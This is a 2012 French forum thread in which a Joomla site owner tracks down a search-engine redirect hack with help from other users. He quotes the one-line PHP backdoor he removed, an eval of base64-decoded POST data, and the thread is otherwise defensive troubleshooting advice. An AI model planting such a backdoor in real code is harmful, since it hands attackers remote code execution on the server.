Probleme hack siteweb joomla

Résolu/Fermé
ubik - 11 oct. 2012 à 10:49
 ubik - 11 oct. 2012 à 14:09
Bonjour,
j'ai des fichiers qui ont du etre hacké sur mon site sur serveur distant
j'utilise joomla comme CMS
le fait est que si je tape l'url d'un site client www.centrecristal.com, ca marche mais si dans google je tape centrecristal, et que je clic sur le premier lien proposé, j'ai une redirection sur un site web fantome, comment corriger ce probleme et relister le site sur google ?

merci d'avance



A voir également:

3 réponses

Mon serveur est deja sous linux, de 1, de 2 je vais pas télécharger ton .exe. De 3 je crois que t'as pas bien lu mon post.
0
Utilisateur anonyme
11 oct. 2012 à 11:08
et de 4 , bonne journée
0
amuses toi bien avec tes copier coller....
0
Pierrecastor Messages postés 41474 Date d'inscription mercredi 5 novembre 2003 Statut Modérateur Dernière intervention 18 janvier 2025 4 145
11 oct. 2012 à 11:46
????
0
^^ bah il me post une reponse pour la suppression d'un virus sur une machine en local ca n'a rien a voir avec mon probleme, et quand tu vois la longueur du texte et le temps de reponse c'est bien du copier coller. Il a supprimé son post.
0
Utilisateur anonyme
11 oct. 2012 à 12:22
tu crois pas que je vais tout reecrire à chaque fois non ?

si ca te pose tant un probleme que ca ignore ca au lieu de jacasser comme une perdrix
0
Pierrecastor Messages postés 41474 Date d'inscription mercredi 5 novembre 2003 Statut Modérateur Dernière intervention 18 janvier 2025 4 145
11 oct. 2012 à 11:26
Salut

Étrange. Peut être un problème dans le htaccess ?

Par contre, si il y à modification de tes fichiers, il y à surement une faille sur ton serveur, il faut déjà trouver d'où ça viens.

Quel version de joomla utilise tu ?


0
2.4, oui j'ai changer les chmod de certains fichiers et trouver un fichier post.php avec un eval(base64_decode en some une injection) la ca doit etre corrigé au niveau des failles mais pour relister sur google je fais comment ?
0
Pierrecastor Messages postés 41474 Date d'inscription mercredi 5 novembre 2003 Statut Modérateur Dernière intervention 18 janvier 2025 4 145
11 oct. 2012 à 11:44
Attendre que le bot google repasse par la ? Tu as un robot.txt ?

Par contre, je reste dubitatif sur la correction de la faille, mais je ne m'y connais pas assez pour t'aider la dessus.
0
merci quand meme ^^
0
lionel-DIL Messages postés 1222 Date d'inscription lundi 25 juin 2012 Statut Membre Dernière intervention 7 août 2014 1 768
11 oct. 2012 à 11:45
Le soucis n'est pas chez google, mais sur votre site.
A mon avis, il y a une redirection lorsque des personnes viennent de Google ( ainsi que Bing, je viens de tester).
Est-ce possible de vérifier tous les fichiers du site ? ( htaccess, robots.txt, sitemap.xml, mais aussi le header et index.php etc.).
Ca va prendre du temps certes.
Sur votre FTP, vous pouvez vérifier aussi toutes les dates des fichiers.
Voilà pour en trouver la cause.

0
j'ai changé le chmod, j'ai supprimé l'injection
<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

j'ai supprimé le module corrompu (selon la date de modifications) (c'était un slideshow sur la home comportant de l'injection)
j'ai changé les codes d'accès de l'administration, les chmod etait bon partout sauf sur ce module forcement donc désormais ça devrait être ok

j'ai soumis de nouveau un sitemap et modifié le robot.txt mais je ne sais pas si google va mettre moins de 90 jours avant de reverifier
0
lionel-DIL Messages postés 1222 Date d'inscription lundi 25 juin 2012 Statut Membre Dernière intervention 7 août 2014 1 768
11 oct. 2012 à 12:21
A mon avis, le soucis ne vient pas de Google.
En effet, Google ne fait qu'une redirection du moteur vers votre site.
L'adresse d'arrivée de la page ( notée sur GG ) est bonne.
Le lien est donc correct.
Lorsqu'on arrive sur votre page, il doit y avoir un code malicieux qui dit ( en gros) que si l'utilisateur vient d'un moteur de recherche, alors il y a une redirection vers le site pourri.

Je suis persuadé que vous avez oublié un morceau de base64 quelque part.
Ceci dit, je peux me tromper, mais à mon avis le soucis est encore sur votre site.
0
juste en effet j'ai remplacé l'index.php par index.html et en effet pas de redirection. mince bon il doit y avoir un autre fichier corrompu que j'ai zappé
0
Bien vu merci pour tes conseil ca marche desormais je pensais que c'etait sur google, en effet j'ai oublié un des fichiers sur le module corrompu la c'est oki ^^
0
lionel-DIL Messages postés 1222 Date d'inscription lundi 25 juin 2012 Statut Membre Dernière intervention 7 août 2014 1 768
11 oct. 2012 à 13:52
Pas de soucis ;-)
Tu peux passer en résolu si c'est le cas ;-)
0